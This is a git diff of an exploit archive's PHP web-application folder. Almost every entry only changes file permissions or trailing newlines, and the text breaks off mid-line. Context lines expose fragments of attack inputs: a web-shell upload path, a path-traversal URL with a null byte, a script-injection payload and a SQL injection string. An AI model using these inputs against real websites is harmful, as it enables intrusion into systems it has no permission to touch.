--git a/platforms/php/webapps/10800.txt b/platforms/php/webapps/10800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10802.txt b/platforms/php/webapps/10802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10803.txt b/platforms/php/webapps/10803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10805.txt b/platforms/php/webapps/10805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10806.txt b/platforms/php/webapps/10806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10807.txt b/platforms/php/webapps/10807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10808.txt b/platforms/php/webapps/10808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10809.txt b/platforms/php/webapps/10809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10810.txt b/platforms/php/webapps/10810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10811.txt b/platforms/php/webapps/10811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10812.txt b/platforms/php/webapps/10812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10813.txt b/platforms/php/webapps/10813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10816.txt b/platforms/php/webapps/10816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10817.txt b/platforms/php/webapps/10817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10822.txt b/platforms/php/webapps/10822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10824.txt b/platforms/php/webapps/10824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10828.txt b/platforms/php/webapps/10828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10830.txt b/platforms/php/webapps/10830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10831.txt b/platforms/php/webapps/10831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10832.txt b/platforms/php/webapps/10832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10833.txt b/platforms/php/webapps/10833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10835.txt b/platforms/php/webapps/10835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10836.txt b/platforms/php/webapps/10836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10837.txt b/platforms/php/webapps/10837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10838.txt b/platforms/php/webapps/10838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10839.txt b/platforms/php/webapps/10839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10844.txt b/platforms/php/webapps/10844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10845.txt b/platforms/php/webapps/10845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10846.txt b/platforms/php/webapps/10846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10847.txt b/platforms/php/webapps/10847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10850.txt b/platforms/php/webapps/10850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10861.txt b/platforms/php/webapps/10861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10869.txt b/platforms/php/webapps/10869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10871.txt b/platforms/php/webapps/10871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10872.txt b/platforms/php/webapps/10872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10873.txt b/platforms/php/webapps/10873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10874.txt b/platforms/php/webapps/10874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10876.txt b/platforms/php/webapps/10876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10877.txt b/platforms/php/webapps/10877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10878.txt b/platforms/php/webapps/10878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10880.php b/platforms/php/webapps/10880.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10882.txt b/platforms/php/webapps/10882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10885.txt b/platforms/php/webapps/10885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10889.txt b/platforms/php/webapps/10889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10891.txt b/platforms/php/webapps/10891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10897.txt b/platforms/php/webapps/10897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10899.txt b/platforms/php/webapps/10899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10901.txt b/platforms/php/webapps/10901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10905.txt b/platforms/php/webapps/10905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10906.txt b/platforms/php/webapps/10906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10910.txt b/platforms/php/webapps/10910.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10912.txt b/platforms/php/webapps/10912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10921.txt b/platforms/php/webapps/10921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10923.txt b/platforms/php/webapps/10923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10924.txt b/platforms/php/webapps/10924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10928.txt b/platforms/php/webapps/10928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10929.txt b/platforms/php/webapps/10929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10930.txt b/platforms/php/webapps/10930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10931.txt b/platforms/php/webapps/10931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10938.txt b/platforms/php/webapps/10938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10941.php b/platforms/php/webapps/10941.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10942.txt b/platforms/php/webapps/10942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10943.txt b/platforms/php/webapps/10943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10944.txt b/platforms/php/webapps/10944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10945.php b/platforms/php/webapps/10945.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10946.txt b/platforms/php/webapps/10946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10948.txt b/platforms/php/webapps/10948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10949.txt b/platforms/php/webapps/10949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1095.txt b/platforms/php/webapps/1095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10950.txt b/platforms/php/webapps/10950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10952.txt b/platforms/php/webapps/10952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10953.txt b/platforms/php/webapps/10953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10962.txt b/platforms/php/webapps/10962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10964.txt b/platforms/php/webapps/10964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10965.txt b/platforms/php/webapps/10965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10966.txt b/platforms/php/webapps/10966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10967.txt b/platforms/php/webapps/10967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10968.txt b/platforms/php/webapps/10968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1097.txt b/platforms/php/webapps/1097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10971.txt b/platforms/php/webapps/10971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10974.txt b/platforms/php/webapps/10974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10976.txt b/platforms/php/webapps/10976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10977.txt b/platforms/php/webapps/10977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10978.txt b/platforms/php/webapps/10978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10979.txt b/platforms/php/webapps/10979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10983.txt b/platforms/php/webapps/10983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10984.txt b/platforms/php/webapps/10984.txt old mode 100755 new mode 100644 index 47c700872..4f5b08a9a --- a/platforms/php/webapps/10984.txt +++ b/platforms/php/webapps/10984.txt @@ -59,4 +59,4 @@ http://server/[kaMtiEz]/images/banners/shell.php.jpg [ EOF ] [+] INDONESIANOCODER TEAM -[+] KILL -9 TEAM \ No newline at end of file +[+] KILL -9 TEAM \ No newline at end of file diff --git a/platforms/php/webapps/10986.txt b/platforms/php/webapps/10986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10988.txt b/platforms/php/webapps/10988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10991.txt b/platforms/php/webapps/10991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11002.txt b/platforms/php/webapps/11002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11003.txt b/platforms/php/webapps/11003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11012.txt b/platforms/php/webapps/11012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11013.txt b/platforms/php/webapps/11013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11014.txt b/platforms/php/webapps/11014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11017.txt b/platforms/php/webapps/11017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11019.txt b/platforms/php/webapps/11019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11024.txt b/platforms/php/webapps/11024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11025.txt b/platforms/php/webapps/11025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11026.php b/platforms/php/webapps/11026.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11028.txt b/platforms/php/webapps/11028.txt old mode 100755 new mode 100644 index c3415b3b8..5c34b7878 --- a/platforms/php/webapps/11028.txt +++ b/platforms/php/webapps/11028.txt @@ -24,5 +24,4 @@ http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lo # Greetz : To all my friends # Note : Proud to be a Sri Lankan # Me : Sri Lankan Hacker -######################################## - \ No newline at end of file +######################################## \ No newline at end of file diff --git a/platforms/php/webapps/1103.txt b/platforms/php/webapps/1103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11031.txt b/platforms/php/webapps/11031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11033.txt b/platforms/php/webapps/11033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11035.txt b/platforms/php/webapps/11035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11036.txt b/platforms/php/webapps/11036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11045.txt b/platforms/php/webapps/11045.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11047.txt b/platforms/php/webapps/11047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11048.txt b/platforms/php/webapps/11048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11051.txt b/platforms/php/webapps/11051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11057.txt b/platforms/php/webapps/11057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1106.txt b/platforms/php/webapps/1106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11060.txt b/platforms/php/webapps/11060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11061.txt b/platforms/php/webapps/11061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11063.txt b/platforms/php/webapps/11063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11068.txt b/platforms/php/webapps/11068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11069.txt b/platforms/php/webapps/11069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11071.txt b/platforms/php/webapps/11071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11075.txt b/platforms/php/webapps/11075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11076.txt b/platforms/php/webapps/11076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11080.txt b/platforms/php/webapps/11080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11081.txt b/platforms/php/webapps/11081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11082.txt b/platforms/php/webapps/11082.txt old mode 100755 new mode 100644 index 2c4735227..25a567cd9 --- a/platforms/php/webapps/11082.txt +++ b/platforms/php/webapps/11082.txt @@ -72,4 +72,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/11083.txt b/platforms/php/webapps/11083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11085.txt b/platforms/php/webapps/11085.txt old mode 100755 new mode 100644 index d86fb2380..71398c481 --- a/platforms/php/webapps/11085.txt +++ b/platforms/php/webapps/11085.txt @@ -72,4 +72,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/11086.txt b/platforms/php/webapps/11086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11087.txt b/platforms/php/webapps/11087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11088.txt b/platforms/php/webapps/11088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11089.txt b/platforms/php/webapps/11089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11090.txt b/platforms/php/webapps/11090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11094.txt b/platforms/php/webapps/11094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11104.txt b/platforms/php/webapps/11104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11107.txt b/platforms/php/webapps/11107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11110.txt b/platforms/php/webapps/11110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11111.txt b/platforms/php/webapps/11111.txt old mode 100755 new mode 100644 index 11d86cb43..34404ef0c --- a/platforms/php/webapps/11111.txt +++ b/platforms/php/webapps/11111.txt @@ -71,4 +71,4 @@ dunno .. :P~~ [ EOF ] [+] INDONESIANOCODER TEAM -[+] KILL -9 TEAM \ No newline at end of file +[+] KILL -9 TEAM \ No newline at end of file diff --git a/platforms/php/webapps/11113.txt b/platforms/php/webapps/11113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11116.html b/platforms/php/webapps/11116.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11120.txt b/platforms/php/webapps/11120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11124.txt b/platforms/php/webapps/11124.txt old mode 100755 new mode 100644 index 84982285e..431492f95 --- a/platforms/php/webapps/11124.txt +++ b/platforms/php/webapps/11124.txt @@ -67,4 +67,4 @@ into different areas. Addt'l Address 1: <script>alert('xss');// Addt'l Address 2: //--></script> Keep in mind each address field has a ~96 char limit. -######################################################### \ No newline at end of file +######################################################### \ No newline at end of file diff --git a/platforms/php/webapps/11126.txt b/platforms/php/webapps/11126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11127.txt b/platforms/php/webapps/11127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1113.pm b/platforms/php/webapps/1113.pm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11135.txt b/platforms/php/webapps/11135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11136.txt b/platforms/php/webapps/11136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11140.txt b/platforms/php/webapps/11140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11141.txt b/platforms/php/webapps/11141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11147.txt b/platforms/php/webapps/11147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11148.txt b/platforms/php/webapps/11148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11155.txt b/platforms/php/webapps/11155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11156.txt b/platforms/php/webapps/11156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11157.txt b/platforms/php/webapps/11157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11158.txt b/platforms/php/webapps/11158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11159.txt b/platforms/php/webapps/11159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11162.txt b/platforms/php/webapps/11162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11163.txt b/platforms/php/webapps/11163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11164.txt b/platforms/php/webapps/11164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11166.txt b/platforms/php/webapps/11166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11168.txt b/platforms/php/webapps/11168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11169.txt b/platforms/php/webapps/11169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11177.txt b/platforms/php/webapps/11177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11178.txt b/platforms/php/webapps/11178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11183.txt b/platforms/php/webapps/11183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11185.html b/platforms/php/webapps/11185.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11188.txt b/platforms/php/webapps/11188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11189.txt b/platforms/php/webapps/11189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11198.txt b/platforms/php/webapps/11198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11213.txt b/platforms/php/webapps/11213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11216.txt b/platforms/php/webapps/11216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11222.txt b/platforms/php/webapps/11222.txt old mode 100755 new mode 100644 index 9ee5cff5f..7b79c0db9 --- a/platforms/php/webapps/11222.txt +++ b/platforms/php/webapps/11222.txt @@ -32,5 +32,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11223.txt b/platforms/php/webapps/11223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11224.txt b/platforms/php/webapps/11224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11225.txt b/platforms/php/webapps/11225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11226.txt b/platforms/php/webapps/11226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11235.txt b/platforms/php/webapps/11235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11236.txt b/platforms/php/webapps/11236.txt old mode 100755 new mode 100644 index ea38f5801..cc36b517b --- a/platforms/php/webapps/11236.txt +++ b/platforms/php/webapps/11236.txt @@ -46,5 +46,4 @@ areas%5B%5D=content&Itemid=1&sectionid=0&limitstart= !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11237.txt b/platforms/php/webapps/11237.txt old mode 100755 new mode 100644 index 05b36a6fa..639f3662a --- a/platforms/php/webapps/11237.txt +++ b/platforms/php/webapps/11237.txt @@ -29,5 +29,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11238.txt b/platforms/php/webapps/11238.txt old mode 100755 new mode 100644 index 389c99b13..bdc7b4534 --- a/platforms/php/webapps/11238.txt +++ b/platforms/php/webapps/11238.txt @@ -26,5 +26,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11239.txt b/platforms/php/webapps/11239.txt old mode 100755 new mode 100644 index fc72939b9..7ded39b9a --- a/platforms/php/webapps/11239.txt +++ b/platforms/php/webapps/11239.txt @@ -43,5 +43,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11240.txt b/platforms/php/webapps/11240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11244.txt b/platforms/php/webapps/11244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11249.txt b/platforms/php/webapps/11249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11258.html b/platforms/php/webapps/11258.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11261.txt b/platforms/php/webapps/11261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11262.php b/platforms/php/webapps/11262.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11263.php b/platforms/php/webapps/11263.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11270.txt b/platforms/php/webapps/11270.txt old mode 100755 new mode 100644 index 174473712..91e6afa8a --- a/platforms/php/webapps/11270.txt +++ b/platforms/php/webapps/11270.txt @@ -45,5 +45,4 @@ Array ( [0] => option [1] => [JOOMLA_PATH] [2] => ' AND 1=1 ) !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11271.txt b/platforms/php/webapps/11271.txt old mode 100755 new mode 100644 index 4ad7bc8a3..d4dc66483 --- a/platforms/php/webapps/11271.txt +++ b/platforms/php/webapps/11271.txt @@ -28,5 +28,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11277.txt b/platforms/php/webapps/11277.txt old mode 100755 new mode 100644 index 64728b4f1..5240bf89f --- a/platforms/php/webapps/11277.txt +++ b/platforms/php/webapps/11277.txt @@ -27,5 +27,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11278.txt b/platforms/php/webapps/11278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11279.txt b/platforms/php/webapps/11279.txt old mode 100755 new mode 100644 index 57862579e..03a5760e6 --- a/platforms/php/webapps/11279.txt +++ b/platforms/php/webapps/11279.txt @@ -31,5 +31,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11280.txt b/platforms/php/webapps/11280.txt old mode 100755 new mode 100644 index ffc5057f7..20bc78e28 --- a/platforms/php/webapps/11280.txt +++ b/platforms/php/webapps/11280.txt @@ -30,5 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11282.txt b/platforms/php/webapps/11282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11284.txt b/platforms/php/webapps/11284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11286.txt b/platforms/php/webapps/11286.txt old mode 100755 new mode 100644 index 69c9d6cfe..1d6929d07 --- a/platforms/php/webapps/11286.txt +++ b/platforms/php/webapps/11286.txt @@ -30,5 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11287.txt b/platforms/php/webapps/11287.txt old mode 100755 new mode 100644 index f3d2d8743..692159c8e --- a/platforms/php/webapps/11287.txt +++ b/platforms/php/webapps/11287.txt @@ -30,5 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11289.txt b/platforms/php/webapps/11289.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11290.txt b/platforms/php/webapps/11290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11292.txt b/platforms/php/webapps/11292.txt old mode 100755 new mode 100644 index 5f9a51065..4cebceaae --- a/platforms/php/webapps/11292.txt +++ b/platforms/php/webapps/11292.txt @@ -25,5 +25,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/php/webapps/11294.txt b/platforms/php/webapps/11294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11296.txt b/platforms/php/webapps/11296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11297.txt b/platforms/php/webapps/11297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11298.txt b/platforms/php/webapps/11298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11299.txt b/platforms/php/webapps/11299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11300.txt b/platforms/php/webapps/11300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11301.txt b/platforms/php/webapps/11301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11303.txt b/platforms/php/webapps/11303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11305.txt b/platforms/php/webapps/11305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11306.txt b/platforms/php/webapps/11306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11307.txt b/platforms/php/webapps/11307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11308.txt b/platforms/php/webapps/11308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11309.txt b/platforms/php/webapps/11309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11311.txt b/platforms/php/webapps/11311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11316.txt b/platforms/php/webapps/11316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11318.txt b/platforms/php/webapps/11318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11319.txt b/platforms/php/webapps/11319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11321.txt b/platforms/php/webapps/11321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11322.txt b/platforms/php/webapps/11322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11323.txt b/platforms/php/webapps/11323.txt old 